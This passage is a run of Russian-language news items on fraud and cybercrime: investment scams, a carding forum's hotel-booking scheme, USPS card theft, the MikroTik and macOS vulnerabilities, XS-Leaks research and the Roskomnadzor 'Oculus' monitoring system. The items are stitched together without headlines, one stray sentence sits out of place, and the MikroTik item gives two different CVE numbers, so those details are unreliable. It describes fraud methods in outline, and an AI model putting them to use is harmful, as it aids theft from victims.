По данному факту следственным отделом ОМВД России по Лодейнопольскому району было возбуждено уголовное дело по части 4 статьи 159 УК РФ. Двое из фигурантов заключены под стражу, остальные отпущены под обязательство о явке.
В ходе обысков, проведённых по местам жительства подозреваемых, обнаружены и изъяты сим-карты, банковские карты, мобильные телефоны, электронные носители и денежные средства.
По предварительным данным, полученные от потерпевших денежные средства злоумышленники переводили на заранее зарегистрированные криптокошельки для конвертации.
В настоящее время проводятся оперативно-розыскные мероприятия и следственные действия, направленные на изобличение других участников организованной группы и установление иных эпизодов преступной деятельности. Также выясняется точное количество жертв и сумма ущерба.
В Московское РУВД столицы обратилась 39-летняя минчанка, которая стала жертвой мошенников.
Потерпевшая планировала вложить в криптовалюту деньги, вырученные после продажи наследства. Она нашла в интернете рекламное объявление о быстром заработке и через мессенджер начала общение с «куратором».
По его указанию женщина зарегистрировалась на определенном сайте, где предлагалось заработать путем торгов. Минчанка приобретала криптовалюту на обменных биржах, а затем переводила ее по реквизитам, указанным в ее профиле.
После пополнения своего баланса более чем на 50 тыс долларов женщина захотела снять заработанные денежные средства, однако «кураторы» выставили требования об оплате дополнительных пошлин.
В результате всех манипуляций потерпевшая перевела свыше 276 тыс рублей, после чего ее «кураторы» ушли в закат.
В румынском сегменте даркнета нашли сайт, создатели которого предлагали услуги по организации и исполнению заказных убийств. На самом деле речь шла об обычных скамерах, но британский журналист Карл Миллер при помощи этичного хакера Криса Монтейро все равно поспособствовали его закрытию.
Эта история произошла еще в 2020 году. Тогда Миллер наткнулся на ресурс, продвигавший услуги заказных убийств. Изюминка состояла в том, что ни одно преступление так и не было совершено, если не считать действий самих мошенников: они принимали предоплату в криптовалюте, но убивать никого не собирались.
Журналист попросил Монтейро исследовать площадку, и тому действительно удалось найти уязвимость в коде и получить доступ ко всей начинке. Среди прочего, он заполучил списки потенциальных жертв и сведения о них, включавшие имена, фотографии, адреса, привычки и даже стандартные маршруты.
Самый дешевый заказ на площадке обошелся в 100 фунтов стерлингов. Его разместила британская продавщица, пожелавшая избавится от своей коллеги, которая конкурировала с ней за внимание мужчины. Одной из самых дорогих стала попытка устранения человека, предпринятая врачом из США — он выплатил более 50 тысяч долларов. В среднем, стоимость чека за убийство варьировалась в пределах от 10 тысяч до 40 тысяч долларов.
Суммарно Миллер и Монтейро отнесли в полицию 175 кейсов, однако поначалу им там не поверили. Дело сдвинулось с мертвой точки только после вмешательства агентов Федерального бюро расследований. При их содействии удалось арестовать 32 человек, которые были в дальнейшем осуждены.
foxnews.com/us/romanian-scammers-ran-fake-hitman-hire-site-lured-desperate- perpetrators-incompetent-assassins
Пользователь evian0 из форума wwh (регистрация от марта 2022 года) обвинил сервис Louis Len (на рынке — с августа 2021 года) в некачественной работе при бронировании цепочки отелей в Казахстане. Этому он посвятил на площадке отдельную тему с жалобой на реализацию отельных и билетных схем в целом, также оставив детальное сообщение в рекламной теме Louis Len. В соответствии с условиями своего предложения Louis Len предлагает отели за 28 процентов от их стоимости при минимальной сумме заказа от 250 долларов.
«Это первый горе-селлер, который сделал отель так, что клиента хлопнула полиция. Клиент влетел на полмиллиона рублей. Селлер, конечно же, решать проблему отказалась. Предложила сделать отель якобы бесплатно, и аккуратно слилась. Все скрины переписки имеются. У меня матерных слов не хватит чтобы описать все то, что я о тебе думаю», — написал evian0, прикрепив скрин переписки с человеком, который, по его словам, провел четыре часа в отделении полиции Астаны и «заплатил за все гостиницы в Казахстане, которые были».
В ответ Louis Len написала, что evian0 — не конечный клиент, а лишь реселлер, «продающий услуги кардинга, как белые». Она заявила, что он не доводит до клиентов сути работы и не предупреждает о возможных последствиях, «исключительно дабы набить свой карман за чужой счет, не думая о безопасности клиентов».
Она также прикрепила скриншот переписки, судя по всему, с evian0, в которой последний признал, что не все его клиенты в курсе, благодаря каким схемам сбивается часть стоимости отеля. В свое оправдание контрагент заявил, что не может сообщать об этом потенциальным клиентам, поскольку в этом случае их не останется.
В отдельной теме evian0 в целом посетовал на положение дел в индустрии, заявив, что «все эти отзывы, которые селлеры сами себе же оставляют — полная туфта».
«Если у селлера процент — выше 35 от стоимости заказа, то это на 90 процентов — ресел. То есть он берет ваш заказ, идет на соседнюю ветку к исполнителю, у которого на 20 процентов ниже, и заказывает у него, накручивая себе 15-20 процентов от вашего заказа за воздух», — написал evian0.
Тем не менее итогом длительного обсуждения стало заключение о спорности позиции топикстартера. На формирование этого мнения повлияло несколько факторов, ключевыми из которых стали откровенная попытка очернить одни сервисы и прорекламировать другие, а также то, что о ситуации с Louis Len он рассказал лишь спустя полгода, так и не открыв арбитраж по этому вопросу.
Несколько сотрудников Почтовой службы США и других лиц обвиняют в мошенничестве и краже личных данных. Им удалось украсть $1,3 млн.
«Ответчики участвовали в многолетней схеме манипулирования компаниями, выпускающими кредитные карты, а также крупными розничными торговцами в Нью- Йорке и Нью-Джерси. Они воровали кредитные карты и использовали их для покупки предметов роскоши и последующей их продажи , – заявил прокурор Дэмиан Уильямс. – Мошенники воспользовались общественным доверием, которое мы оказываем сотрудникам Почтовой службы США (USPS) для собственной финансовой выгоды».
Всего, по данным ведомства, в схеме участвовали 9 человек, трое из которых – сотрудники Почтовой службы США. Натаниэль Фуко, Джонатан Персо и Фабиола Момпоинт (все сотрудники USPS) арестованы. Арестован и Девон Ричардс. Остальные подозреваемые пока на свободе – Джонни Дамус, Рашан Ричардс, Конрад Херон, Луи Джен Верли и Карим Шеферд.
Примерно с декабря 2018 года по настоящее время участники заговора работали с сотрудниками почты, воровали кредитные карты из почтового потока до того, как их доставляли клиентам. Получив украденные кредитные карты, участники заговора, используя украденную личную информацию предполагаемых получателей, активировали их.
Затем использовали украденные карты для покупки предметов роскоши, среди которых Chanel, Fendi, Hermes и Dior.
После этого дельцы сбывали товары в магазине LuxurySnob, который позиционировал себя как магазин предметов роскоши, но на самом деле многие из продаваемых там товаров были куплены с использованием украденных кредитных карт.
«Эти девять обвиняемых, трое из которых являются почтовыми служащими, стремились обогатиться путем воровства почты непосредственно у сотен клиентов. Они, совершив кражу личных данных этих клиентов, еще больше усугубили свои преступления. Не заблуждайтесь, Служба почтовой инспекции не позволит ворам, кем бы они ни были, использовать Почту США для нанесения вреда клиентам или финансовым учреждениям. Мы рады, что члены этого преступного синдиката задержаны, а их преступная деятельность прекращена», – заявил главный инспектор USPIS Дэниел Брубейкер.
«Специальные агенты Управления генерального инспектора почтовой службы США будут и в дальнейшем поддерживать целостность Почтовой службы США и ее персонала. Предполагаемое поведение является постыдным, и наш офис и в дальнейшем активно будет расследовать действия сотрудников почтовой службы и их сообщников, которые подрывают общественное доверие. USPS OIG благодарна нашим партнерам из правоохранительных органов и Департамента юстиции за их самоотверженность и усилия в этом расследовании», – добавил специальный агент USPS-OIG Мэтью Модаффери.
По разным обвинениям подозреваемым грозит от 2 до 30 лет лишения свободы.
source: justice[.]gov/usao-sdny/pr/multiple-us-postal-service-employees-and- others-arrested-13-million-fraud-and-identity
Apple recently fixed a security vulnerability in the macOS operating system
that could be potentially exploited by a threat actor to "trivially and
reliably" bypass a "myriad of foundational macOS security mechanisms" and run
arbitrary code.
Security researcher Patrick Wardle detailed the discovery in a series of
tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the issue
relates
Read More: <https://thehackernews.com/2021/12/expert-details-macos-bug-that- could-let.html>
Прокурорами Черниговской окружной прокуратуры направлен в суд обвинительный акт в отношении двух жителей города Киева по фактам кражи, совершенной по предварительному сговору группой лиц, в особо крупных размерах, несанкционированного вмешательства в работу информационной (автоматизированной) системы, легализации имущества, полученного преступным путем (ч. 5 ст. 185, ч. 5 ст. 361, ч. 1 ст. 209 УК Украины).
По данным следствия, мужчины, используя информационную базу с персональными данными относительно идентификационных кодов граждан, осуществили несанкционированное вмешательство в систему управления банковскими карточками, в результате чего получили доступ к мобильному приложению одного из клиентов. Изменив пароль для входа в систему, они похитили с карточки потерпевшего более 900 тыс. грн.
Стремясь скрыть полученные преступным путем денежные средства, злоумышленники потратили их на приобретение гаджетов, ювелирных украшений и криптовалюты.
Сейчас обвиняемые содержатся под стражей. С целью обеспечения возмещения причиненных убытков наложен арест на их имущество, стоимостью 420 тыс. грн.
За содеянное обвиняемым грозит наказание в виде лишения свободы на срок от десяти до пятнадцати лет.
Досудебное расследование осуществлялось следователями Черниговского РУП ГУНП в Черниговской области.
Китай обходит санкции и использует бюджетные чипы Nvidia для создания
сверхбыстрых ракет
Поднебесная нашла хитрый способ обойти санкции и обогнать США в технологической гонке. Исследователи из Китая разработали пошаговое руководство, которое позволяет значительно повысить эффективность гиперзвукового оружия с помощью недорогого процессора Nvidia Jetson TX2i, который можно купить за $1000 - $1300.
Тесты показали, что этот модуль обрабатывает сложные вычисления в 4 раза быстрее , чем моргание человеческого глаза. Это делает его идеальным для оптимизации систем подачи топлива, диагностики и управления двигателями scramjet в реальном времени.
Использование бюджетного чипа Nvidia в системах управления гиперзвуковыми аппаратами не только повысило их дальность и стабильность, но и значительно сократило затраты на исследования и разработку.
Мошенники обещали женщине возможность зарабатывать по 10 тыс. долларов на инвестициях, за это она должна была перечислять средства под видом «вкладов».
Украинка попала «на крючок» аферистов и вложила в фиктивную брокерскую компанию почти 5,5 млн гривен. Об этом сообщают в полиции Тернопольской области.
Правоохранители сообщают, что женщина заинтересовалась инвестированием после того, как увидела информацию об этом у одного из блогеров. Она сразу приобрела курс обучения и заплатила 16 тыс. гривен за регистрацию аккаунта на сайте брокерской компании.
Мошенники часто звонили женщине и обещали ей зарабатывать по 10 тыс. долларов ежеквартально, за это она должна была перечислять им средства под видом «вкладов».
Сначала женщина перечисляла деньги на банковские карточки мошенников. Когда она отдала фиктивной компании 600 тыс. гривен, то получила первую «прибыль» в размере 28 тыс. грн.
Через некоторое время злоумышленники убедили женщину перечислять деньги не в гривне, а в долларах и на криптокошельок. Для того, чтобы пополнять свой «финансовый портфель», она занимала средства и брала кредиты. В целом за 4 месяца она отдала фиктивной брокерской компании почти 5,5 млн гривен.
Мошенничество с инвестициями
Не редко украинцы встречаются с мошенниками, которые под видом различных компаний и предложений пытаются выманить деньги. Одной таких схем является якобы вложение в криптовалюту, когда мошенники обещая большие прибыли видом вложений воруют средства у своих жертв.
В полиции говорят, что прежде чем работать с инвестиционными фондами нужно проверить их лицензию, репутацию и тексты пользовательских соглашений, чтобы не быть обманутыми. Также одной из черт мошенников является обычно навязчивое предложение жертвам увеличить свои сбережения и доход.
Так, одна из таких схем была разоблачена в Киеве в начале прошлого года. Злоумышленники предлагали зарабатывать на инвестициях, а для этого жертве требовалось вложить минимум 11 тыс. грн. В частности, одного из участников такой схемы задержали во время получения от очередной жертвы 400 тыс. грн.
Также еще одних мошенников правоохранители разоблачили в июне этого года. Под видом call-центров они звонили своим жертвам и убеждали получать пассивную прибыль от инвестирования. Тогда в Офисе Генпрокурора сообщалось, что на заблокированных счетах злоумышленников обнаружили 15 млн грн.
Такие крупные компании, как Siemens, Ericsson и даже NASA — могут быть атакованы благодаря уязвимости повышения привилегий.
Исследователи VulnCheck обнаружили способ получить полный контроль над устройствами MikroTik, работающими на операционной системе RouterOS. Всё дело в том, что в данном программном обеспечении содержится опасная уязвимость повышения привилегий. Атакующие могут использовать её для проникновения в защищённые сети и перехвата сетевого трафика.
Уязвимость ( CVE-2023-30788 ) затрагивает до 900 тысяч роутеров MikroTik, которые используют процессоры MIPS и RouterOS редакции Stable до 6.49.7 и редакции Long-Term до 6.48.6.
«Наихудший сценарий развития событий заключается в том, что атакующий сможет установить и выполнять произвольные инструменты на базовой операционной системе Linux», — говорит Якоб Бейнс, главный исследователь компании VulnCheck, которая и опубликовала несколько эксплойтов для этой уязвимости. «Удалённые и авторизованные злоумышленники могут использовать уязвимость, чтобы получить root-оболочку на роутере», — повышая привилегии администратора до уровня супер-администратора.
MikroTik оперативно выпустила исправление для затронутых версий RouterOS, поэтому администраторам следует применить его как можно скорее. Среди клиентов компании есть такие известные организации, как NASA, ABB, Ericsson, Saab, Siemens и Sprint. Некоторые крупные интернет-провайдеры из разных стран также используют роутеры данного производителя как основные.
Тем временем, поиск на платформе Shodan показал, что по состоянию на 18 июля в сети было зарегистрировано от 500 тысяч до 900 тысяч роутеров MikroTik, которые всё ещё уязвимы к CVE-2023-30799 через свои интерфейсы Web или Winbox.
«Устройства MikroTik являются лакомой целью для продвинутых злоумышленников уже давно, потому что они обеспечивают мощный доступ к защищённым сетям», — говорит Бейнс.
Таким киберпреступным объединениям, как TrickBot, VPNFilter и Slingshot, — ранее уже удавалось успешно атаковать эти устройства. Так, в 2022 году Microsoft предупреждала о том, что хакеры TrickBot используют роутеры MikroTik в качестве прокси для своих C2-серверов. Кроме того, в утечке документов ЦРУ «Vault 7» на Wikileaks содержался эксплойт для роутеров MikroTik.
Атака, которую разработали специалисты VulnCheck, требует использования возвратно-ориентированного программирования (ROP). Это техника эксплойта, при которой атакующий выполняет вредоносный код, объединяя маленькие кусочки существующего кода программного обеспечения. VulnCheck, по сути, разработала новую цепочку ROP, которая работает против RouterOS на архитектуре MIPS Big Endian (MIPSBE).
Для эксплуатации уязвимости атакующему уже необходим доступ к целевому устройству MikroTik, однако, как сообщают исследователи, получить учётные данные от RouterOS — относительно простая задача для опытных киберпреступников.
Для обеспечения безопасности исследователи VulnCheck рекомендуют всем организациям, использующим затронутые версии устройств MikroTik незамедлительно обновить их до последней версии программного обеспечения. А если это по какой-то причине невозможно, — отключить свои интерфейсы Winbox и Web, ограничить IP-адреса, с которых могут входить администраторы, отключить парольный доступ и настроить SSH для использования публичных/приватных ключей.
«В конечном итоге, мы рекомендуем перейти на решение без использования паролей», — говорит Бейнс. Организациям, которые всё же вынуждены использовать пароли, в идеале следует перейти на более надёжные и сложные пароли, чтобы предотвратить злонамеренную эксплуатацию этой и других уязвимостей.
Всем злоумышленникам грозит по 20 лет тюрьмы.
Министерство юстиции США опубликовало документ, в котором восьми лицам предъявлены обвинения по составу преступления, предусмотренному Актом "Об организациях, связанных с рэкетом и коррупцией" (RICO), включающем в себя хакинг и налоговые махинации. В обвинительном заключении были перечислены имена злоумышленников:
Энди Жак;
Моника Шонтель Дженкинс;
Луи Ноэль Мишель;
Джефф Джордан Профт-Франциск;
Дикенсон Элан;
Майкл Жан Пуа;
Владимир Черелус;
Луисан Жолтеус.
Жак, Пуа, Дженкинс и Мишель получили дополнительные обвинения в участии в заговоре, целью которого было мошенничество с использованием электронных средств коммуникации и кража личных данных. За все свои преступления злоумышленники получили максимальное наказание – 22 года лишения свободы.
Согласно документам, с которыми ознакомился суд, все началось с того, что Дженкинс, Мишель, Профт-Франциск, Черелус и RICH4EVER4430 (ныне покойный член банды) приобрели в дарквебе учетные данные серверов сертифицированных бухгалтеров (CPA) и фирм, предоставляющих услуги налоговой подготовки по всей стране.
Получив учетные данные, злоумышленники проникли на серверы и украли налоговые декларации тысяч налогоплательщиков, которые были клиентами CPA и фирм, занимающихся налоговой подготовкой.
Похитив декларации, злоумышленники объединились с Жаком, Эланом, Пуа, Жолтеусом, а также другими преступниками, после чего создали крупное предприятие, которое использовалось для подачи тысяч поддельных налоговых деклараций на имена более чем 9000 жертв. Чтобы все выглядело законно, мошенники открыли банковские счета на разные фиктивные бизнесы и начали получать фальшивые гонорары налоговых специалистов.
Кроме того, злоумышленники сумели похитить идентификационные номера, которые Налоговая служба США выдала CPA и фирмам, предоставляющим услуги налоговой подготовки. Преступники воспользовались ими и подали огромное количество фальшивых налоговых деклараций.
По данным прокуратуры США, за четыре года злоумышленники заработали около $4 млн, хотя планировали получить более $36 млн.
30-летний житель Южной Кореи получил четыре года тюрьмы за сексуальные домогательства к несовершеннолетним в неназванной «популярной» метавселенной. Об этом сообщают местные СМИ.
По данным издания, подсудимый зарегистрировался на одной из корейских платформ виртуальной реальности. С декабря 2021 по март 2022 года он посредством своего персонажа общался с учащимися младшей и старшей школы.
Мужчина дарил несовершеннолетним подарки, взамен чего просил присылать обнаженные фотографии. Также на его компьютере нашли переписку непристойного содержания.
Подсудимый признал свою вину. При вынесении приговора суд учел, что материалы сексуального характера не распространялись и не использовались для получения прибыли.
Помимо тюремного заключения, фигурант пройдет принудительную 80-часовую программу лечения от сексуальных девиаций и в течение семи лет не сможет занимать должности в работающих с детьми организациях.
Напомним, в июне Федеральная полиция Австралии совместно с Университетом Монаша начали обучать искусственный интеллект распознавать насилие над детьми.
Интриги и расследования вокруг киберпротивостояния Ирана и Израиля не утихают.
На днях в Министерстве юстиции Израиля сообщили, что привлекли гражданина, работавшего уборщиком в доме министра обороны Бенни Ганца к трем годам тюремного заключения за попытку шпионажа в пользу хакеров, связанных с Ираном.
Омри Горен Гороховский, 38-летний житель центрального города Лод, работал в доме Ганца в Рош-ха-Аине недалеко от Тель-Авива.
Арест подозреваемого произошел еще в ноябре прошлого года по обвинению в попытке шпионажа в пользу хакерской группировки Black Shadow путем получения и передачи хакерам информации из дома Ганца.
[Источники сообщают](https://www.timesofisrael.com/house-cleaner-sentenced- to-3-years-for-snooping-on-gantz-for-iran), что Гороховский заключил сделку со следствием и признал вину.
Однако Агентство внутренней безопасности ШАБАК еще в прошлом году заявило, что Гороховский так и не получил доступа к «секретным материалам» и, следовательно, не смог успешно поделиться государственными секретами.
Более того, он был арестован всего через пару дней после того, как связался с Black Shadow.
Эпичности ситуации добавляет тот факт, что у Гороховского обширная криминальная история, в которой пять судимостей и тюремное заключение за различные преступления, включая ограбление банка, что, мягко говоря, вызывает большие вопросы о том, как его вообще наняли для работы в доме одного из высших должностных лиц Израиля.
Black Shadow обвиняют в многочисленных атаках на инфраструктуру Израиля.
Взломы уже давно рассматриваются в призме многолетнего противостояния между Израилем и Ираном, причем включая как физические атаки на корабли, так и наступательные воздействия в информационном пространстве.
Структура Роскомнадзора выделила 57,7 млн руб. на разработку системы «Окулус», которая на основе нейросетей будет анализировать фото, видео и тексты на сайтах, в соцсетях и мессенджерах на предмет запрещенной информации, в том числе пропаганды гомосексуализма, изготовления наркотиков и оружия. Система должна появиться уже к декабрю. Эксперты сомневаются, что выделенной суммы хватит на разработку, а исполнитель сможет уложиться в срок — только для обучающих дата-сетов для нейросети нужно гораздо больше времени.
Разработкой системы «Окулус» для «Главного радиочастотного центра» (ФГУП ГРЧЦ, структура Роскомнадзора) займется ООО «Эксикьюшн Эр Ди Си», компания получит на реализацию проекта 57,7 млн руб. Информация об этом опубликована на сайте госзакупок 15 августа. Сделать систему нужно к 12 декабря.
По технической документации, «Окулус» будет в реальном времени анализировать изображения и видео, переписки в чатах и материалы каналов мессенджеров, URL-адреса и другие данные на предмет запрещенной информации
Click to expand...
Система должна находить запрещенный контент не только в текстовом виде, но и в «сценах, сочетаниях предметов, композициях образов, лицах, статике и динамике движений».
По данным «СПАРК-Интерфакс», ООО «Эксикьюшн Эр Ди Си» (Execution RDS) учреждено в 2014 году с уставным капиталом 10 тыс. руб. По итогам 2021 года компания получила 229 млн руб. выручки при 23 млн руб. чистой прибыли. Возглавляет ООО Анастасия Юрикова, 95% принадлежит Артему Пономореву, а 5% — Сергею Браилко. Судя по данным «СПАРК-Интерфакс», компания никогда не была исполнителем по госконтрактам. Execution RDS реализовывала проекты по внедрению в российских компаниях решений на базе софта немецкой SAP, следует из информации на ее сайте.
Click to expand...
По условиям тендера подрядчик обязан не только создать систему, но и предоставить ГРЧЦ дата-сеты, которые позволят определять запрещенную информацию. Исполнитель также поставит ГРЧЦ размеченные наборы данных для обучения модели распознавания лиц «в объеме не менее 100», так как в «Окулус» должен быть реализован «функционал каталогов определяемой символики, сцен и действий, персоналий».
Мощность системы должна составить 200 тыс. изображений в сутки, это значит, что в секунду «Окулус» будет анализировать два кадра или картинки.
Click to expand...
По словам директора по цифровым технологиям ГРЧЦ Константина Буланова, для стабильной работы системы понадобится не менее 48 серверов, оснащенных графическими ускорителями, а поиск запрещенного контента будет осуществляться благодаря нейронным сетям, работающим на основе глубокого машинного обучения.
В список запрещенного контента, который призвана анализировать система (содержится в приложении к техдокументации), помимо материалов с признаками экстремизма и терроризма, призывов к массовым незаконным мероприятиям, выражения явного неуважение к обществу, государству и официальным символам РФ, информации о способах совершения суицида и методах изготовления наркотиков, вошли также пропаганда нетрадиционных сексуальных отношений и демонстрация употребления табачной продукции.
Собеседник “Ъ” в крупной IT-компании, знакомый с содержанием технического задания проекта, говорит, что на деле реализовать такую систему не только в столь короткий срок и за 57 млн руб., но и в принципе практически невозможно:
«Исполнителю ставят не конкретные цели, задачи и требования, которые можно выполнить при доработке уже существующей и работающей системы, а просят спроектировать принципиально новое решение, что невозможно сделать в обозначенный срок».
Click to expand...
В то же время гендиректор Smart Engines Владимир Арлазаров полагает, что «на текущем уровне развития IT» заявленные задачи можно решать с качеством порядка 90%, то есть с 10% ошибок. «Удивление вызывают сроки: только сбор репрезентативных обучающих дата-сетов может занять гораздо больше времени». Современные модели искусственного интеллекта, говорит эксперт, классифицирующие поведение человека в видеоряде, обычно обучаются на данных объемом около 1 млн роликов.
source: kommersant.ru/doc/5514297
Заместитель председателя Совета безопасности РФ Дмитрий Медведев сообщил, что в Соединенных Штатах Америки до сих пор не предоставили какого-либо ответа относительно кибер-атак на серверы Центральной избирательной комиссии Российской Федерации во время проведения выборов в Государственную думу, половина из которых производилась из Штатов.
«Мы об этом открыто сказали, что приблизительно 50% этих атак шли через США… Объективные данные такие. Они пока нам, кстати, на эту тему ничего определённого так и не ответили», — заявил он.
Напомним, до этого в ЦИК рассказали о трех атаках из-за рубежа на интернет- ресурсы избиркома в первый день выборов. Там отметили, что атаки были мощные, но российские специалисты смогли их отразить.
После чего спикер Совфеда Валентина Матвиенко отметила, что Россия будет обращаться с просьбами разобраться к тем странам, откуда были зафиксированы кибератаки на избирательную комиссию.
Как передавала Общественная Служба Новостей ранее, зампред Совбеза Российской Федерации Дмитрий Медведев заявил, что задержание хакеров из группировки REvil является позитивным примером сотрудничества РФ и США.
Правоохранители выяснили, что из арендованных в Одессе офисных помещений, оборудованных компьютерной техникой и SIP-телефонией, осуществлялись звонки клиентам зарубежных банков. Представляясь работниками этих учреждений, людям сообщали, что с их платежных карточек якобы кто-то снимает деньги, поэтому, чтобы прекратить несанкционированное вмешательство, им нужна информация о сроке действия карточек, CVV-кода и ПИН-кода. Как только граждане предоставляли злоумышленникам конфиденциальные данные, те с помощью специального программного обеспечения снимали с них средства.
В помещениях мошеннических call-центров и по месту проживания их организаторов полицейские провели санкционированные обыски, в ходе которых изъяли более половины сотни единиц компьютерной техники, мобильные телефоны, черновые записи и подготовленные языковые модули.
Сейчас правоохранители снимают информацию с изъятой техники, устанавливают всех обманутых граждан и сумму нанесенного им ущерба.
Специалисты Рурского университета в Бохуме и Университета прикладных наук Нижнего Рейна (Германия) выявили 14 новых атак «межсайтовых утечек» (XS-Leaks) на современные браузеры, в том числе Google Chrome, Microsoft Edge, Safari и Mozilla Firefox.
XS-Leaks – атаки по сторонним каналам, позволяющие вредоносным сайтам обходить правило ограничения домена (same-origin policy) в браузере и в фоновом режиме похищать информацию из доверенного ресурса, на котором пользователь вводит данные. К примеру, с помощью подобной атаки сайт, открытый в неактивной вкладке браузера, может похищать содержимое электронного почтового ящика из сервиса электронной почты в активной вкладке.
Межсайтовые утечки не являются чем-то новым, однако, по словам исследователей, не все из них были выявлены и классифицированы как XS-Leaks, а корень проблемы до сих пор остается невыясненным.
Специалисты Рурского университета в Бохуме и Университета прикладных наук Нижнего Рейна решили провести исследование и установить новые методы XS-Leaks, разработать механизмы защиты и получить лучшее представление о том, как эти атаки работают.
Сначала исследователи определили три характеристики межсайтовых утечек и оценили все методы включения и техники утечки для большого количества браузеров. Три основных компонента всех XS-Leaks – методы включения, техники утечки и очевидные различия. Создав модель на основе этих характеристик, исследователи обнаружили 34 атаки XS-Leaks, 14 из которых ранее не были известны.
Специалисты протестировали все выявленные ими атаки на 56 комбинациях браузеров и операционных систем с целью определить, насколько уязвимыми они являются. Они разработали специальное web-приложение под названием XSinator , позволяющее любому желающему проверить, насколько их браузеры и ОС уязвимы к каждой из 34 атак X-Leaks.
Снижение или устранение рисков, связанных с этими атаками, – задача разработчиков браузеров, считают исследователи. В частности, они предлагают запретить все сообщения обработчика событий, свести к минимуму количество сообщений об ошибках, применить ограничения глобального лимита и создать новое свойство истории при перенаправлении. Другие эффективные методы смягчения последствий – использование X-Frame-Options для предотвращения загрузки HTML- ресурсов элементами iframe и реализация заголовка CORP для контроля того, могут ли страницы встраивать ресурс.
«COIU, также известная как First-Party Isolation (FPI), является опциональной функцией безопасности, которую пользователи могут активировать в настройках Firefox (about:config) и которая изначально была представлена в Tor Browser», – сообщили исследователи.
В зависимости от сайта атаки XS-Leaks могут иметь весьма серьезные последствия. Пользователям рекомендуется работать с полностью обновленными браузерами и отключить сторонние cookie-файлы. Это обезопасит их от большинства атак XS-Leaks, даже если на сайте не используются новые методы защиты наподобие COOP, CORP, SameSite Cookies и пр.
Исследователи рассказали о своих находках разработчикам браузеров, которые в настоящее время работают над исправлением проблем.
• Source: [https://news.rub.de/english/press-r...security-14-new-attacks-web- browsers-detected](https://news.rub.de/english/press-releases/2021-12-02-it- security-14-new-attacks-web-browsers-detected)
Децентрализованная криптовалютная биржа (DEX) dYdX предупредила пользователей об уязвимости смарт-контракта, запущенного 24 ноября. Ошибки были найдены «белым хакером».
dYdX сообщила в Twitter о том, что пользователи должны вывести активы с биржи на свой криптовалютные кошельки.
«Всем пользователям, которые размещали депозиты со среды 24 ноября, рекомендуется вывести активы как можно скорее. Ваши деньги не подвержены риску, но должны быть возвращены обратно на ваши кошельки».
Связано это с тем, что белый хакер под ником Samczsun вместе со службой безопасности торговой платформы dYdX смог выявить ряд уязвимостей в смарт- контракте. Благодаря своевременному вмешательству, платформе удалось защитить потенциально уязвимые депозиты более 700 пользователей на сумму около $2 миллионов.
dYdX посоветовала пользователям не отправлять депозиты на DEX до тех пор, пока оператор не уведомит, что это безопасно. Биржа сообщила, что аккаунты пользователей, которые не использовали новый смарт-контракт в продукте Layer 2 Perpetuals, не были затронуты в ходе устранения уязвимости.
В ходе ликвидации ошибок смарт-контрактов услуги по созданию депозитов без комиссии были отключены. Биржа уведомит пользователей о восстановлении этой возможности. Также площадка представит полный отчет о произошедшем инциденте.
На фоне участившихся случаев кибератак и мошенничества в секторе DEX большая удача, что уязвимость была вовремя обнаружена и локализована. Аналитическая компания Elliptic недавно сообщила, что объем убытков из-за преступлений на рынке DeFi в 2021 году увеличился в семь раз. Не удивительно, что в последнее время целью хакеров становится сектор DeFi. Согласно данным отчета Chainalysis, объем торгов на крупных DEX вырос на 550% в 2021 году, а безопасность многих платформ находится не на самом высоком уровне.
За 68 млн рублей ведомство ищет подкованного и профессионального подрядчика по поиску утечек персональных данных российских пользователей в интернете и даркнете.
Цель данного проекта — своевременно инициировать проведение мероприятий по расследованию и реагированию на соответствующие инциденты (утечки данных, компрометация информационных систем, принадлежащих государственным органам и операторам связи, анализ и изучение появления новых мошеннических схем, связанных с монетизацией скомпрометированных персональных данных).
Минцифры предлагает выделить 2 уровня критичности в обнаруженных утечках: низкий уровень с менее 100 тыс. данных пользователей и высокий — от 100 тыс. пользователей.
Источник ~ https://www.securitylab.ru/news/526514.php
Прокуратура города Минска направила в Минский городской суд для определения подсудности уголовное дело в отношении 17-летнего минчанина и 18-летнего борисовчанина, которым инкриминированы мошенничество и хищение имущества путем модификации компьютерной информации в составе организованной группы.
Согласно материалам дела обвиняемые, следуя своей роли и зная, что банковские платежные карты будут использованы участниками преступного сообщества для хищений средств у физических лиц, подыскали граждан, которые за материальное вознаграждение передали им сведения о платежных банковских картах.
Они же предоставили информацию о платежных картах иным участникам организованной группы и впоследствии получили в наличной форме в банкоматах деньги потерпевших.
В результате противоправной деятельности 128 гражданам причинен имущественный ущерб в сумме более 564 тыс. рублей.
При изучении материалов уголовного дела в прокуратуре города Минска пришли к выводу об обоснованности обвинения, достаточности собранных доказательств, полном и объективном исследовании обстоятельств преступлений. Согласились с квалификацией действий борисовчанина по ч.4 ст.209, ч.4 ст.212 Уголовного кодекса Республики Беларусь, а несовершеннолетнего минчанина – по ч.4 ст.212 Уголовного кодекса Республики Беларусь.
Ранее примененные в отношении обвиняемых меры пресечения в виде заключения под стражу и домашнего ареста прокурор оставил без изменения.
Сотрудниками уголовного розыска ОМВД России по району Хорошево-Мневники г. Москвы задержаны двое мужчин, подозреваемых в хищении путём обмана 1,8 млн рублей 81-летней жительницы столицы.
Предварительно установлено, что в конце лета прошлого года ей на мобильный телефон поступил звонок от неизвестного мужчины, который, представившись сотрудником правоохранительных органов, сообщил, что с банковского счета женщины аферисты пытаются снять денежные средства. Чтобы обезопасить сбережения, звонивший предложил ей снять все имеющиеся деньги в ближайшем отделении банка и передать курьеру.
Поверив злоумышленнику, пенсионерка сняла со счета более 1,1 млн рублей, после чего, следуя его указаниям, передала деньги прибывшему незнакомцу.
На следующий день с потерпевшей вновь связался лжесотрудник правоохранительных органов и, узнав, что у неё имеются и другие счета, порекомендовал поступить с накоплениями аналогичным способом. Приехав в отделение банка, бабушка посредством банкомата перевела на неустановленный банковский счёт злоумышленников более 700 тысяч рублей.
Спустя время она поняла, что её обманули, и обратилась в полицию. Общая сумма ущерба составила более 1,8 миллиона рублей.
По версии полиции, задержанные 27-летний житель Московской области и 31-летний приезжий предположительно являются организатором мошеннической схемы и курьером. В настоящее время установлена причастность сообщников к 5 аналогичным эпизодам противоправной деятельности.
Следователем Отдела МВД России по району Хорошево-Мневники г. Москвы возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 Уголовного кодекса Российской Федерации. Фигурантам избрана мера пресечения в виде заключения под стражу.
Центробанк, МВД, Минцифры, Роскомнадзор и участники рынка обсуждают создание антифрод-платформы для совместной работы банковских организаций и операторов связи, сообщает «Коммерсантъ».
